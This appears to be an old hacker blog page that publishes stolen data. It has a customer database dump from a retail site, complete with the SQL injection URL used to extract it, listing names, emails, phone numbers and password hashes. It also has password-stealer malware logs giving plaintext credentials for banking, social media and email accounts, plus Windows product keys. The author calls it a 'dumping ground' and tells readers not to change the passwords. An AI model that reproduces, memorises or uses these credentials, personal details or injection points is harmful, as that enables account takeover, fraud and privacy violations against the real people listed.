Search For Specific Site

Loading...

Greetings

Welcome to my dumping ground of passwords, everything posted here are from my password logs and from stealers found on youtube that I have cracked.

Due to the posted accounts having their passwords changed I will now be protecting them in a download, enjoy and please don't change any passwords, the accounts will be recovered and it will not be available any longer.

31 July, 2010

Saltillo.com-customersextract

Website : http://www.saltillo.com/products/index.php?product=32+and+1=0+

Database : saltillo_shop

Table : customers

customers_firstname:customers_lastname:customers_dob:customers_email_address:customers_default_address_id:customers_telephone:customers_password:

John:doe:2001-01-01 00:00:00:root@localhost:1:12345:d95e8fa7f20a009372eb3477473fcd34:1c:
Dave:Hershberger:1962-01-04 00:00:00:daveh@saltillo.com:2:330-674-6722:bb7c2d96a75fa7b9e7c6d2d069530284:5f:
Dave:Hershberger:1980-02-02 00:00:00:aac@saltillo.com:3:330-674-6722:30fffbb1f779a6c4c6dad074630bea24:63:
John:Dewey:1953-07-02 00:00:00:deweyj@christina.k12.de.us:4:302-454-2202:89c7f9e0736d0b7e710842109273ba08:d1:
eduardo:fuertes:1970-02-05 00:00:00:pfuertes@techys.net:6:787-750-7061:9e6a685e3ffffb66cf748d090fd8b568:f4:
julie:patterson:5555-05-05 00:00:00:julie@saltillo.com:7:330-262-0441:9eb261f70b343d3e852a107a218e33f7:66:
Melissa:Hennings:1982-05-19 00:00:00:mhennings@opportunitiesunlimited.com:8:712-277-8295:86afe8e0530705aadcfea8e7f676912c:b1:
Chris:Del Rosario:1970-09-10 00:00:00:asads75@hotmail.com:9:808-677-6646:8c86c71dda89845fd685d32406aca3d7:81:
Melissa:Moon:1980-01-08 00:00:00:DarMelMoon@aol.com:10:4323682024:d2c68f7e13554b537be38c3321628bee:e5:
Penelope:CHAMBERS:1947-04-23 00:00:00:chambers@kennedykrieger.org:11:443-923-7800:04f30d69b577ba9c044d33dbf42d30e5:db:
Isabel:Hart:1954-05-19 00:00:00:Isabel_Hart@tjx.com:13:508-390-3620:08a84556a9468db8333d1c0fcb27697f:99:
michelle:morris:1941-07-21 00:00:00:mlm19341@aol.com:14:7143973261:5bed8781985a33ed20e9f93aa956933a:99:
Dimitar:Mihaylov:1985-10-29 00:00:00:dimitarm@rila.com:15:003592:2cee37446d5b06a244a039f49886e0bc:51:
Tina:Bailey:1966-01-31 00:00:00:tbailey@ncatp.org:16:919-850-2787:30a7239d54422881a873457035b4f5af:7d:
Shirley:Perea:1982-03-11 00:00:00:sperea@newyorkcenterforautism.com:17:(212) 860-2580:72f919b01119363edf1bdc417ce6f7d5:9e:
Camille:Krieger:0000-00-00 00:00:00:kriegerc@kcsd.k12.or.us:18:541 883-5000 ext. 229:abbf7935fa8cddeab24c9048cb2a5b3e:e8:
Richard:Lehman:0000-00-00 00:00:00:rlehman@vbschools.net:19:419-299-0657:eef771fabbd720611b4d3cabc33e1ca4:9c:
Robbin:Newton:0000-00-00 00:00:00:newto007@mc.duke.edu:20:919-684-2869:fcfeedcf91dd41714c18ba34839dcec8:70:
Karen:Zrenda:0000-00-00 00:00:00:karen.zrenda@yale.edu:23:203-785-7176:18eb06b1b15ae0d9a4f763df0add9b58:df:
cathreen:curtis:0000-00-00 00:00:00:cc4babies@aol.com:24:909-433-4685:2cbf3ecab2da2746ce8ecf4898738b46:7a:
Brito:Christine:0000-00-00 00:00:00:cbrito@d49.org:25:719-592-3532:b4f8c468c1808f355528cc367b5a3f41:71:
Beverly:Kenik:0000-00-00 00:00:00:bevsp@wyoming.com:26:307 684-5654:e9dd2f38da9195bd89d81789d8e0e6d4:9d:
Rebecca:Sitton:0000-00-00 00:00:00:rsitton@ncatp.org:27:919-850-2787:034cbc3aa30e6ee8c4cbcdee52d14b8d:36:
Gregg:Larson:0000-00-00 00:00:00:chrismlarson@yahoo.com:28:217 688-2472:75b3a75a036ba6774d54961ee07ed254:67:
madeline:van leuvan:0000-00-00 00:00:00:vanleuvanm@mta.net:29:310-225-6020:6214ca79ccd09bb322c94f3c4bc0fdf9:ad:
Wendy:Roth:0000-00-00 00:00:00:aptwendy@buckeye-express.com:30:419 621-1166:744654f57bde2f84dada52d6ef67c4a4:ea:
Steven:Fleeman:0000-00-00 00:00:00:s.m.fleeman@att.net:33:(623)393-9166:7dc472ab3460a2316c99ace9e1da03b9:dc:
Jobey:King:0000-00-00 00:00:00:jobey.king@mosaicinfo.org:34:1-402-420-5622:8d991c9b6bb3ae818eb3470e6a56d709:8b:
ASSISTIVE:TECHNOLOGY:0000-00-00 00:00:00:PLSEEVERS@INTERACT.CCSD.NET:35:702-855-8440:f55b1860095c49c96f4116127d1339d4:48:
David:Baker:0000-00-00 00:00:00:David.Baker@rockhurst.edu:36:816-501-4651:d70bfe8c5b264f05d5a48e85836fddd2:0f:
Pavlo:Pedan:0000-00-00 00:00:00:pp@korpus.lviv.ua:38:+380503173791:c3242523b8ae1563a121deb7b15ae9bf:98:
Andrew:Phillips:0000-00-00 00:00:00:a.phillips@pcps.ucl.ac.uk:40:+44 1708 640547:74b173b2d1a34e01e6bda664e1192381:54:
Pan:Ham:0000-00-00 00:00:00:Panham@seznam.cz:39:+42000000000:9cf98b7964d8cfda30033aefba693d78:0c:
Marsye:Kaplan:0000-00-00 00:00:00:mkaplan@bcps.org:41:410-887-2299:1cde8a552c33e1524d4c7ec79811a72c:0e:
Eiko:Neusaenger:0000-00-00 00:00:00:eiko800@yahoo.com:42:317-845-9126:1567453812063da02a969570349f0832:7d:
Loralee:Bailey:0000-00-00 00:00:00:loralee.bailey@district196.org:43:651-683-6969:941eca9e7bf66720536c4cdb366275bf:e4:
Wilfredo:Colon:0000-00-00 00:00:00:ue_wcolon@suagm.edu:44:787-257-7373 Ext. 3928:918dd54a46db22ec512ff7603d243a4d:30:
Dustin:Hankinson:0000-00-00 00:00:00:dhankinson@bresnan.net:46:406-327-8999:39b530955a22909c81c6f8b5a0abc4a8:75:
Michele:Barrow:0000-00-00 00:00:00:MicheleB@Chesapeake-Care.org:47:410-287-5040:f42ca07392a9e82519e557b7b478df42:d0:
Patricia:Siimes:0000-00-00 00:00:00:psiimes@charter.net:48:5088653541:408289b62fcbffc5440db59cfa82f7fa:76:
chris:merriman:0000-00-00 00:00:00:merriman@ruralinstitute.umt.edu:49:406.243-2439:919f7b92e32077d86c617c430b5dc685:b9:
Denise:Wood:0000-00-00 00:00:00:woodd@gwise.lesa.k12.mi.us:52:517-223-6361:0c64fb555bbfe8befe7a7c8b8436eadc:58:
carla:hopkins:0000-00-00 00:00:00:carla@hopkins.net:53:281-641-2100:ef895e97f0985fe6286115bd74b9164d:de:
Bow-Chi:Wang:0000-00-00 00:00:00:wang20319_77450@yahoo.com:54:281.796.1825:47fc649ef898dabcb1ac4fc351b1a482:aa:
Donna:Johnson:0000-00-00 00:00:00:donnajohnson@bellsouth.net:57:678-698-3986:5b34acb0fc0baeeb5ecd7bfb6e5e738d:22:
Michele:Strealy:0000-00-00 00:00:00:micheles@avondalehouse.org:56:713 993-9544:602faa539c9b9271ae438370a9e39537:51:
Larry:Hurd:0000-00-00 00:00:00:hurds@olypen.com:58:3604170362:08aeb4321437311bd179af043a21becb:74:
Maxine:Rossiter:0000-00-00 00:00:00:maxine@dsgp.org:59:620-669-8522:a90902330c9fb21cc9650bc8df313ae1:10:
Gary:Swetnam:0000-00-00 00:00:00:gswetnam@hillcroft.org:60:765.281.6912:30ed0b4e1b39b6038da69d3a426cb23a:b0:
Sherril:York:0000-00-00 00:00:00:sherril.york@okstate.edu:62:405-744-7609:b1426158fd5922d440182819b572baaf:43:
Kim:Livingston:0000-00-00 00:00:00:klivingston@eastersealsma.org:63:508-751-6328:246af9b47f0f1290989ee769098e02f6:86:
Ryan:Zaph:0000-00-00 00:00:00:rmzaph@aol.com:64:3042848790:268a337e23014cba074e3d858fb6e4f9:f8:
Christi:Guthrie:0000-00-00 00:00:00:stinkydogs2@aol.com:65:(828) 342-7878:66edeb5876c7cc0aa6fcaf8c394f0ec8:1e:
Pamela:Diedrich:0000-00-00 00:00:00:pdiedrich@ruralinstitute.umt.edu:67:406-243-2638:9e28e2365f919f820ecda1f33deb96cd:8b:
Niaisha:Gonzalez:0000-00-00 00:00:00:niaishagonzalez@msn.com:66:310-258-4156:4176c19fa9546fbcf7a3bb7d11a2165a:33:
Leslie:Riggins:0000-00-00 00:00:00:leslie.riggins@dads.state.tx.us:68:325-795-3614:bbf8a6c2a1efdec2c14ec7b56e0e7d63:2a:
Joan:Hance:0000-00-00 00:00:00:djhance@srt.com:69:701-839-9319:1cdf9fe807dd3a11b619433b75c7c58d:10:
Stan:Strickman:0000-00-00 00:00:00:stan@trailsm.com:70:505.875.1721:61463a2f03ee564da5e2cbbcaa3b21cd:86:
Larry:Hurd:0000-00-00 00:00:00:Larry_Hurd@pasd.wednet.edu:71:3605651649:ee209321581a3eb2f7ec6cc547f7b9e3:07:
Cindy:Wright:0000-00-00 00:00:00:wright.cindy@gmail.com:72:210-313-8530:05a257d5d117f621615f7f638b4eda4f:23:
stephanie:olinger:0000-00-00 00:00:00:stolinger1@netzero.net:73:8592935281:6447d49e3e62983e06b0a85d3b2bc1ac:2c:
Mickie:Campbell:0000-00-00 00:00:00:mickie_campbell@beavton.k12.or.us:74:503-591-4417:5746c069941e3e65cd1b5cd52cda68a4:0d:
cheryl:mccann:0000-00-00 00:00:00:chermccann@hotmail.com:76:7405134439:a24f6f0505c2d551e5369b3fc8285458:e8:
Rebecca:Koger:0000-00-00 00:00:00:pmkoger@msn.com:77:435-512-9985:d0d085c1754ae39fc63971096404e3fd:90:
Diana:Weese:0000-00-00 00:00:00:dweese@lausd.k12.ca.us:79:818 888-5280:bcb1e80d990e0bddd99a728be656ce2b:b4:
Barbara:Brooks:0000-00-00 00:00:00:bbrooks@colonial.k12.de.us:80:(302) 429-4055:df5a8a40068b70eee3ccdfaedf4980a4:7e:
Carolyn:Collins:0000-00-00 00:00:00:cacollins@thehelpgroup.org:82:310-751-1146:d18703dd3c461bb3a0accb7bb743cb3d:21:
Debra:Stokesbary:0000-00-00 00:00:00:debin2jc@excute.com:85:209-744-8266:090ed2a831739405fbc68673176ed69b:7d:
Susan:Rosen:0000-00-00 00:00:00:suero@socal.rr.com:86:818-342-2326:6bfc538d8d9fbace061ed77cdf29bb04:8c:
Huynh Ba:Phuong:0000-00-00 00:00:00:vision1006@aol.com:87:84-8-8399275:689478cbf9c72abcd32eaa8aae221271:92:
Davi:Reis:0000-00-00 00:00:00:davi.reis@gmail.com:89:+55 (31) 32854020:9d50d9a97d7d1cca67abfc4e019930df:77:
barb:solomonson:0000-00-00 00:00:00:bsolomonson@tbaisd.k12.mi.us:88:231 9226449:7befeb8739df8eb737a7ca9dbb96fdfa:5b:
Carol:Styn:0000-00-00 00:00:00:greenolds@adelphia.net:91:716-681-4481:f4fb414d19b0450eb55915b90d2891c7:21:
Rosa M:Ortiz:0000-00-00 00:00:00:chamariafe@hotmail.com:90:7877170651:e90c4447720302b1f7833c1f65d7ce88:23:
Kelly:Clever:0000-00-00 00:00:00:K_Clever@yahoo.com:92:419.468.3942:c5d124acce1f2124c93fea400b3fce1f:bd:
Karen:Pocius:0000-00-00 00:00:00:karen.pocius@newcanaan.k12.ct.us:93:203-594-4021:13a555019d03535fd6169262b3a790fd:9a:
Cheryl:Whitesell:0000-00-00 00:00:00:cherylwhitesell@missouristate.edu:95:417-836-5260:2e6736ce9a9ff9e25ea9903dcd32ec1d:0e:
Kay:Moser:0000-00-00 00:00:00:moserk@monroeps.org:94:203-452-5843:1dccde8c9728861406d098cfceccd257:ea:
Gloria:Anderson-Ballard:0000-00-00 00:00:00:innovativetherapeuticservices@yahoo.com:97:908-359-4569:1e805c609c90ec644d2e0684adc9b277:b6:
Lisa:Roll:0000-00-00 00:00:00:lisa.roll@mbi.ufl.edu:98:(352)846-3455:5bbc60af329981a24589633e57032c71:28:
olga:pinero:0000-00-00 00:00:00:opinero@honolulu.gov:100:(808) 626-7001:e7ead2732be642e58906f14b156092ae:27:
Ken:Hawco:0000-00-00 00:00:00:kenhawco@nl.rogers.com:101:(709) 368-1227:c8bd1ddd075e0c74d88f196039001070:81:
Vivian:Johnson:0000-00-00 00:00:00:johnsonv@health.missouri.edu:102:417-461-5403:f61c0c5f2e7acd6bba3fa23ee4d5bbf9:c8:
Traci:Peplinski:0000-00-00 00:00:00:tracijean2@Juno.com:103:805 644-5146:d2daf5353cbea64a943d180931d43fce:0e:
Jessica:Vollmer:0000-00-00 00:00:00:jvollmer@mdtap.org:104:410-554-9230:15a92af81836f22b1b52b57b7eaa4201:f7:
KEELY:JOHNSON:0000-00-00 00:00:00:keely.johnson@childrensmn.org:105:612-813-5860:c6829a7b9a0c9433f6b28f46033c20a1:32:
Gayle:Scott:0000-00-00 00:00:00:accesscomputers@earthlink.net:107:513-932-5454:d0bdf44e8458c262d3fb5c7398e10887:e7:
sharon:parker:0000-00-00 00:00:00:sharon26p@cox.net:108:4018468461:85c292323b26c893cc3011b4cc46ee21:45:
cherie:plumlee:0000-00-00 00:00:00:cherie-p@pacbell.net:109:925 9437139:4ce9699f5c5d1c3d6a2f3496108fa787:50:
Dawn:Glazar:0000-00-00 00:00:00:dmglazar@verizon.net:110:302-764-2520:1de8273bbf82fec65b17ffe022e5a805:f4:
Brenda:Thorne:0000-00-00 00:00:00:Brenda.Thorne@wwrc.virginia.gov:111:540-332-7038:f17f2c0aca05934e109212c22546f2b0:06:
kathy:maemori:0000-00-00 00:00:00:kathy_maemori@notes.k12.hi.us:112:8087334940:3246d244a1b65f54b1c6185934130c56:98:
Dotty:Raiche:0000-00-00 00:00:00:garnold@jri.org:113:4135282523:6c597c3d64936aec2a97ccdeaf8d1803:a2:
Nancy:Grejtak:0000-00-00 00:00:00:dwells@losaltos.k12.ca.us:116:650-947-1150:1a06313008b30c0fbe1a3c0542f2aaee:b9:
Virginia:Middendorff:0000-00-00 00:00:00:TLClinic@aol.com:117:618-594-5561:9d7e43120bdb83503e29228d5afb5f16:68:
Susan:Rice:0000-00-00 00:00:00:smrice@cebridge.net:118:440-564-9029:acb93ae9135f5a7ab83a853761b79d18:88:
Shirley:Donnelly:0000-00-00 00:00:00:cmccambridge@gmail.com:119:813-842-1166:6b9cacbfb5fc1d6a9f86cdc71beb6b7f:8f:
Andrea:Winslow:0000-00-00 00:00:00:andrea@bayanddelta.com:120:(916) 524-3535:58471843fbf664b61a4523c416de0398:2b:
pat:politano:0000-00-00 00:00:00:politano@uic.edu:121:312 413 1555:d0f60aca79ea40c3d185580df2019523:98:
Didier:Roy:0000-00-00 00:00:00:d.roy@groupe-halisol.com:122:00 33 1 44 34 81 07:3645199c3ca71e2de014fb0ab807cea9:88:
Karen:Bloomberg:0000-00-00 00:00:00:k.bloomberg@latrobe.edu.au:123:03 9479 1802:e24d4f5ca5c291b3b528dd5609b846bd:83:

20 February, 2010

7 Free Rapidshare Premium Accounts

Download Here

ADMIN_31476048

Over 30 accounts including rapidshare and social network sites.

Download Passwords

ROSAAN-PC_94186483

=====================================
========== Firefox Stealer ==========
===== HackHound.Org - Visit Us! =====
=====================================

--------------------
http://byethost.com
FlipSearch
master
--------------------
http://www.byethost.com
b24_3325
master
b24_3325826
master
b13_3511489
master
--------------------
https://www.google.com
britezmail
master940203
--------------------
http://www.l4rge.com
britez
master
--------------------
http://www.free-space.net
britez
master
--------------------
http://sharemafia.com
gtaclub
master
--------------------
http://www.sharemafia.com
gtaclub
master
--------------------
http://www.britez.co.cc
rosaan
master
britezmail@gmail.com
master
jogtika@gmail.com
649486
jogtika
649486
--------------------
http://www.socialdating.co.cc
rosaan
master
--------------------
http://file-managers.net
b13_3511489
master
--------------------
http://www.facebook.com
gtaclub@gmail.com
master
--------------------
http://panel.byethost.com
b13_3511489
master
--------------------
http://www.flipface.co.cc
b13_3511489
master
britezmail@gmail.com
master
admin
master

=====================================
======== c0ded By |x Seabra x|=======
=====================================

ANNE-LAPTOP_85172871

=====================================
========== Firefox Stealer ==========
===== HackHound.Org - Visit Us! =====
=====================================

--------------------
https://bro-portalln.smartbro.net
1010006519
0120895508
--------------------
https://ebanking.unionbankph.com
spyder
twain1632
7285
--------------------
http://www.tipidpc.com
twain1632
0spyder0
--------------------
http://members.driverguide.com
twain1632@yahoo.com
spyder
--------------------
http://systemone.uplb.edu.ph
2003-54660
Shielaazores
--------------------
https://systemone.uplb.edu.ph
2003-54660
shielaazores
200354660
shielaazores
--------------------
http://www.tipidcp.com
twain1632
0spyder0
--------------------
http://tipidpc.com
twain1632
0spyder0
--------------------
http://www.poolstars.com
twain1632@yahoo.com
spyder
--------------------
https://signin.ebay.ph
twain1632
spyder
--------------------
http://www.pcx.com.ph
twain1632@yahoo.com
spyder
--------------------
http://www.friendster.com
twain1632@yahoo.com
spyder
--------------------
http://www.maxicare.com.ph
twain1632
spyder
--------------------
http://forum.gsmhosting.com
twain1632
spyder
--------------------
http://auction.ph
twain1632
spyder
--------------------
http://e-services.meralco.com.ph
twain1632
spyder

=====================================
======== c0ded By |x Seabra x|=======
=====================================

19 February, 2010

PC14-pc14-12-11-2009

Internet Explorer passwords:

Website: http://warez-hacker.info/forum/viewforum.php

Username: thunder358

Password: 0122776027

Website: http://warez-hacker.info/forum/ucp.php

Username: Thunder358

Password: 0122776027

Website: https://www.google.com/accounts/servicelogin

Username: Thunder358

Password: 0122776027



No-IP Passwords

Email:

Password:

Windows Product Key:

W9VCJ-74DXW-JDDBV-PW777-WXD2T

ZIGI-PC-Zigi-12-8-2009

Firefox Passwords:

Website: http://www.facebook.com

Username: sadeta_abazi@yahoo.co.uk

Password: slikica





Windows Live Messenger Passwords:

E-mail: zigi_irl@hotmail.com

Password: elmwood

E-mail: sdaetaabazi@hitmail.com

Password: slikica

E-mail: sdaeta.abazi@hotmail.com

Password: elmwood

E-mail: sdaeta.abazi@hitmail.com

Password: slikica



No-IP Passwords

Email:

Password:

Windows Product Key:

342DG-6YJR8-X92GV-V7DCV-P4K27